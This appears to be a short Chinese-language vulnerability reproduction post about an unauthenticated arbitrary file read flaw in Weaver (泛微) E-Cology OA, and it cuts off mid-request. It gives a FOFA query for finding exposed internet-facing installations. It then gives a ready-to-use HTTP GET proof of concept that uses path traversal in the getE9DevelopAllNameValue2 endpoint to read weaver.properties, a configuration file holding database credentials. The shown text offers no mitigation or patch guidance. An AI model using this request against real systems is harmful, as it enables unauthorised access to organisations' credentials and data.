0x01 产品简介

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微E-Cology 依托全新的设计理念，全新的管理思想。为中大型组织创建全新的高效协同办公环境。能语音办公，简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化，后端7大引擎，满足组织集成化、个性化应用需求。

0x02 漏洞概述

泛微E-Cology getE9DevelopAllNameValue2接口处任意文件读取漏洞，未经身份验证的攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：app="泛微-OA（e-cology）"

0x04 漏洞复现

PoC

GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS